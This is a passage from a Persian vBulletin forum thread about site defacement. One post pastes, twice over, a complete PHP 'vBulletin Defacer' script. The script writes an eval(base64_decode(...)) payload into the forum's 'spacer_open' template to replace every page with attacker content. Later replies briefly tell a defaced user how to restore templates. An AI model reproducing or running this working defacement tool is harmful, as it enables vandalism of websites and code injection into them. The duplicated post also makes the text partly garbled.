تبلیغات در اینترنت

تبلیغات در اینترنتگیفت کارت گوگل پلی
صفحه 2 از 2 نخستنخست 12
نمایش نتایج: از 11 به 15 از 15

موضوع: صفحه ی دیفیس!

  1. Top | #11
    مدیر بازنشته

    تاریخ عضویت
    Mar 2011
    ورژن ویبولتین
    4.1.9
    نوشته ها
    3,995
    مورد پسند
    3,578 بار
    نوشته های وبلاگ
    2
    اطلاعات
    میزان امتیاز
    477

    پیش فرض

    فکر کنم منظور علی جان اسکریپت های Automatic Defacers via DataBase هستش
    دوستان محض اطلاع میگم اینا انواع مختلفی دارن
    مثلا واسه جوملا میتونین از Joomla Defacer
    واسه ویبولتین از vBulletin Defacer
    واسه مای بی بی از Mybb Defacer
    و ...
    بعنوان مثال برای ویبولتین :
    میتونین از کد
    کد PHP:
    <?php
    /*
    |.|.|.|.|.|.|.|.|.|.|.|.|.|.|.|.|.|.|.|.|.|.|.|.|.|.|
    |.|###################################################|.|
    |.|# #|.|
    |.|# <==-|AL-MoGrM|-==> - <==-|t0v@HoTmAiL.CoM-==> #|.|
    |.|# #|.|
    |.|###################################################|.|
    |.|.|.|.|.|.|.|.|.|.|.|.|.|.|.|.|.|.|.|.|.|.|.|.|.|.|
    */

    ?>
    <html><style>
    input, select, textarea **
    background-color: #000000;
    border-style: #7a7c7d;
    border-width: 1px;
    font-family: verdana, arial, sans-serif;
    font-size: 11px;
    color: #7a7c7d;
    padding: 0px;
    }
    A:link **
    COLOR:#A2A2A2; TEXT-DECORATION: none
    }
    A:visited **
    COLOR:#A2A2A2; TEXT-DECORATION: none
    }
    A:active **
    COLOR:#787878; TEXT-DECORATION: none
    }
    A:hover **
    color:#8C8C8C;TEXT-DECORATION: none
    }
    </style>
    <head>
    <title>Change All pages For Forum</title>
    <meta http-equiv="Content-Type" content="text/html; charset=utf-8">
    </head>
    <body bgcolor="black" text="#7a7c7d">
    <div align="center">
    <H2><u>AL-M<strong>0</strong>GrM</u></H2>
    |<a href="mailto:[email protected]">t0v(AT)HoTmaiL(DoT)CoM</a>| | <a href="http://tryag.com/cc/">WwW.TrYaG.CoM</a> |<br>
    <u>Change All pages For Forum</u>
    <br><br>
    <?

    if(empty($_POST['index']))**
    echo 
    "<FORM method=\"POST\">
    host : <INPUT size=\"15\" value=\"localhost\" name=\"localhost\" type=\"text\">
    database : <INPUT size=\"15\" value=\"forum_vb\" name=\"database\" type=\"text\"><br>
    username : <INPUT size=\"15\" value=\"forum_vb\" name=\"username\" type=\"text\">
    password : <INPUT size=\"15\" value=\"vb\" name=\"password\" type=\"password\"><br>
    <br>
    <textarea name=\"index\" cols=\"70\" rows=\"30\">Set Your Index</textarea><br>
    <INPUT value=\"Set\" name=\"send\" type=\"submit\">
    </FORM>"
    ;
    }else{
    $localhost $_POST['localhost'];
    $database $_POST['database'];
    $username $_POST['username'];
    $password $_POST['password'];
    $index $_POST['index'];
    @
    mysql_connect($localhost,$username,$password) or die(mysql_error());
    @
    mysql_select_db($database) or die(mysql_error());

    $index=str_replace("\'","'",$index);

    $set_index "**\${eval(base64_decode(\'";

    $set_index .= base64_encode("echo \"$index\";");


    $set_index .= "\'))}}**\${exit()}}</textarea>";

    $ok=@mysql_query("UPDATE template SET template ='".$set_index."' WHERE title ='spacer_open'") or die(mysql_error());

    if(
    $ok)**
    echo 
    "!! update finish !!<br><br>";
    }

    }
    # Footer
    echo "<strong>SpeciaL GreeTz To :</strong> <u>Mohajer22</u>";
    ?>
    فکر کنم منظور علی جان اسکریپت های Automatic Defacers via DataBase هستش
    دوستان محض اطلاع میگم اینا انواع مختلفی دارن
    مثلا واسه جوملا میتونین از Joomla Defacer
    واسه ویبولتین از vBulletin Defacer
    واسه مای بی بی از Mybb Defacer
    و ...
    بعنوان مثال برای ویبولتین :
    میتونین از کد
    کد PHP:
    <?php
    /*
    |.|.|.|.|.|.|.|.|.|.|.|.|.|.|.|.|.|.|.|.|.|.|.|.|.|.|
    |.|###################################################|.|
    |.|# #|.|
    |.|# <==-|AL-MoGrM|-==> - <==-|t0v@HoTmAiL.CoM-==> #|.|
    |.|# #|.|
    |.|###################################################|.|
    |.|.|.|.|.|.|.|.|.|.|.|.|.|.|.|.|.|.|.|.|.|.|.|.|.|.|
    */

    ?>
    <html><style>
    input, select, textarea **
    background-color: #000000;
    border-style: #7a7c7d;
    border-width: 1px;
    font-family: verdana, arial, sans-serif;
    font-size: 11px;
    color: #7a7c7d;
    padding: 0px;
    }
    A:link **
    COLOR:#A2A2A2; TEXT-DECORATION: none
    }
    A:visited **
    COLOR:#A2A2A2; TEXT-DECORATION: none
    }
    A:active **
    COLOR:#787878; TEXT-DECORATION: none
    }
    A:hover **
    color:#8C8C8C;TEXT-DECORATION: none
    }
    </style>
    <head>
    <title>Change All pages For Forum</title>
    <meta http-equiv="Content-Type" content="text/html; charset=utf-8">
    </head>
    <body bgcolor="black" text="#7a7c7d">
    <div align="center">
    <H2><u>AL-M<strong>0</strong>GrM</u></H2>
    |<a href="mailto:[email protected]">t0v(AT)HoTmaiL(DoT)CoM</a>| | <a href="http://tryag.com/cc/">WwW.TrYaG.CoM</a> |<br>
    <u>Change All pages For Forum</u>
    <br><br>
    <?

    if(empty($_POST['index']))**
    echo 
    "<FORM method=\"POST\">
    host : <INPUT size=\"15\" value=\"localhost\" name=\"localhost\" type=\"text\">
    database : <INPUT size=\"15\" value=\"forum_vb\" name=\"database\" type=\"text\"><br>
    username : <INPUT size=\"15\" value=\"forum_vb\" name=\"username\" type=\"text\">
    password : <INPUT size=\"15\" value=\"vb\" name=\"password\" type=\"password\"><br>
    <br>
    <textarea name=\"index\" cols=\"70\" rows=\"30\">Set Your Index</textarea><br>
    <INPUT value=\"Set\" name=\"send\" type=\"submit\">
    </FORM>"
    ;
    }else{
    $localhost $_POST['localhost'];
    $database $_POST['database'];
    $username $_POST['username'];
    $password $_POST['password'];
    $index $_POST['index'];
    @
    mysql_connect($localhost,$username,$password) or die(mysql_error());
    @
    mysql_select_db($database) or die(mysql_error());

    $index=str_replace("\'","'",$index);

    $set_index "**\${eval(base64_decode(\'";

    $set_index .= base64_encode("echo \"$index\";");


    $set_index .= "\'))}}**\${exit()}}</textarea>";

    $ok=@mysql_query("UPDATE template SET template ='".$set_index."' WHERE title ='spacer_open'") or die(mysql_error());

    if(
    $ok)**
    echo 
    "!! update finish !!<br><br>";
    }

    }
    # Footer
    echo "<strong>SpeciaL GreeTz To :</strong> <u>Mohajer22</u>";
    ?>
    منبع کد ها : انجمن های آشیانه

    کاربر مقابل از Ariyan بابت این پست مفید تشکر کرده است:





  2. گیفت کارت آیتونز

  3. Top | #12
    کاربر سایت

    تاریخ عضویت
    Nov 2011
    ورژن ویبولتین
    All version
    سن
    22
    نوشته ها
    371
    مورد پسند
    110 بار
    اطلاعات
    Windows 7/Server 2008 R2 Firefox 5.0
    میزان امتیاز
    45

    پیش فرض

    سایتم دیفیس شده‌ index حذف کردم بازم همون اینیدکس هست چکار کنم؟
    DSST und3rgr0und Team

    dsst.ir
    وقتی برنده میشوی، نیازی به توضیح نداری! وقتی می بازی چیزی برای توضیح دادن نداری

  4. Top | #13
    کاربر ویژه

    تاریخ عضویت
    Oct 2010
    ورژن ویبولتین
    4.1.X
    سن
    26
    نوشته ها
    146
    مورد پسند
    110 بار
    اطلاعات
    Windows 7/Server 2008 R2 Firefox 15.0
    میزان امتیاز
    23

    پیش فرض

    نقل قول نوشته اصلی توسط ™Security نمایش پست ها
    سایتم دیفیس شده‌ index حذف کردم بازم همون اینیدکس هست چکار کنم؟

    تا اونجایی که من میدونم... باید تیبل index رو از phpmy admin توسط یک تیبل قدیمی سالمتون ریپلیس کنید ... مشکلتون باید حل شه ...




  5. Top | #14
    مدیر بازنشته

    تاریخ عضویت
    Dec 2011
    ورژن ویبولتین
    4.2
    نوشته ها
    783
    مورد پسند
    1,638 بار
    نوشته های وبلاگ
    3
    اطلاعات
    Windows 7/Server 2008 R2 Firefox 14.0.1
    میزان امتیاز
    115

    پیش فرض

    سایت داری یا انجمن ؟
    اگر سایت هست ایندکس قالبتو عوض کردن تعویض کن درست میشه .

    کاربر مقابل از Mr.Mostafa بابت این پست مفید تشکر کرده است:

    ا م ض ا

  6. Top | #15
    کاربر سایت

    تاریخ عضویت
    May 2010
    ورژن ویبولتین
    4.2
    سن
    22
    نوشته ها
    3,417
    مورد پسند
    8,062 بار
    نوشته های وبلاگ
    1
    اطلاعات
    Windows 7/Server 2008 R2 Chrome 22.0.1229.52
    میزان امتیاز
    523

    پیش فرض

    نقل قول نوشته اصلی توسط ™Security نمایش پست ها
    سایتم دیفیس شده‌ index حذف کردم بازم همون اینیدکس هست چکار کنم؟
    تاپیک 1 سال پیش رو بی دلیل بالا نیارید!.
    برای طرح سوال تاپیک جدید بزنید .
    بسته شد .


صفحه 2 از 2 نخستنخست 12

اطلاعات موضوع

کاربرانی که در حال مشاهده این موضوع هستند

در حال حاضر 1 کاربر در حال مشاهده این موضوع است. (0 کاربران و 1 مهمان ها)

موضوعات مشابه

  1. پاسخ: 43
    آخرين نوشته: 2014/04/01, 03:58 PM
  2. ارسال خودکار مطالب به فیس بوک
    توسط forex2nice در انجمن پرسش و پاسخ
    پاسخ: 26
    آخرين نوشته: 2013/08/01, 02:55 PM
  3. عجیب ترین جرایم فیس بوکی
    توسط Reza در انجمن بحث آزاد
    پاسخ: 1
    آخرين نوشته: 2011/09/28, 03:54 PM
  4. نظر شما درباره فیس بوک ؟
    توسط espad2 در انجمن بحث آزاد
    پاسخ: 12
    آخرين نوشته: 2011/07/11, 01:56 PM
  5. ‫طرح : مردانه و زنانه کردن فیس بوک!
    توسط Ariyan در انجمن بحث آزاد
    پاسخ: 8
    آخرين نوشته: 2011/07/03, 07:42 AM

کلمات کلیدی این موضوع

علاقه مندی ها (Bookmarks)

علاقه مندی ها (Bookmarks)

مجوز های ارسال و ویرایش

  • شما نمیتوانید موضوع جدیدی ارسال کنید
  • شما امکان ارسال پاسخ را ندارید
  • شما نمیتوانید فایل پیوست کنید.
  • شما نمیتوانید پست های خود را ویرایش کنید
  •